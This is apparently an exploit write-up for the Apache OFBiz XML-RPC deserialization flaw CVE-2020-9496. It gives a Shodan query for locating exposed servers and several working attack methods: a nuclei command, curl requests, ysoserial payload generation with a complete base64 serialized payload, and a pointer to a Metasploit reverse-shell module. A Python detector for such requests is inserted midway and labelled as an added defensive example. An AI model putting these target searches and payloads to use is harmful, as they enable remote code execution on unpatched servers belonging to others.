Affected versions
- Versions < 17.12.04
Asset fingerprint
- Set-Cookie : OFBiz.Visitor
Searching Shodan for related assets
shodan search --fields ip_str,port,org,hostnames OFBiz.Visitor
I won't paste the specific results here.
POC
cve-2020-9496
id: CVE-2020-9496
Method 1
echo "https://localhost:8443" | nuclei -t cves/CVE-2020-9496.yaml
Method 2
curl https://localhost:8443/webtools/control/xmlrpc -v -X POST -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36' -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>' -k -H 'Content-Type: application/xml'
Method 3
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /tmp/cve-2020-9496" | base64 | tr -d "\n"
java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://dnslog.io" | base64 | tr -d "\n"
POST /webtools/control/xmlrpc HTTP/1.1
curl http://localhost:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEWcxNjFjLmwuZG5zbG9nLmlvdAAAcQB+AAV0AARodHRwcHh0ABhodHRwOi8vZzE2MWMubC5kbnNsb2cuaW94</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
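A defender-side check for the request shape used in the two curl requests above, as an added example that is not part of the original post: it labels POSTs to /webtools/control/xmlrpc and marks those whose `<serializable>` element decodes to the Java serialization magic bytes (0xACED0005). The function name, the labels and the sample requests are assumptions constructed for illustration.

```python
import base64
import re

XMLRPC_PATH = "/webtools/control/xmlrpc"
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # Java serialization stream magic + version

# <serializable> element (Apache XML-RPC extensions), optionally namespace-prefixed
SERIALIZABLE_RE = re.compile(
    rb"<(?:\w+:)?serializable\b[^>]*>([A-Za-z0-9+/=\s]+)</(?:\w+:)?serializable>",
    re.IGNORECASE,
)


def classify_request(method, path, body):
    """Hypothetical helper: label one logged HTTP request.

    Returns "serialized-object", "xmlrpc-post" or None.
    """
    # Drop query string and ;jsessionid=... before comparing the path
    clean_path = re.split(r"[?;]", path, maxsplit=1)[0].rstrip("/")
    if method.upper() != "POST" or clean_path != XMLRPC_PATH:
        return None
    for match in SERIALIZABLE_RE.finditer(body):
        blob = b"".join(match.group(1).split())
        try:
            decoded = base64.b64decode(blob + b"=" * (-len(blob) % 4))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if decoded.startswith(JAVA_SERIAL_MAGIC):
            return "serialized-object"
    return "xmlrpc-post"


# Constructed sample requests (not captured traffic): (method, path, body)
_BLOB = base64.b64encode(JAVA_SERIAL_MAGIC + b"constructed-placeholder")
_NS = b'xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"'
SAMPLES = [
    ("POST", "/webtools/control/xmlrpc",
     b"<methodCall><params><param><value><serializable " + _NS + b">"
     + _BLOB + b"</serializable></value></param></params></methodCall>"),
    ("POST", "/webtools/control/xmlrpc;jsessionid=ABC",
     b"<methodCall><methodName>x</methodName></methodCall>"),
    ("GET", "/webtools/control/main", b""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, "->", classify_request(method, path, body))
```

Request bodies are only available where a proxy or WAF records them; with plain access logs, only the method and path part of the check applies.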
Method 4
msf includes an exploit for this vulnerability that returns a reverse shell.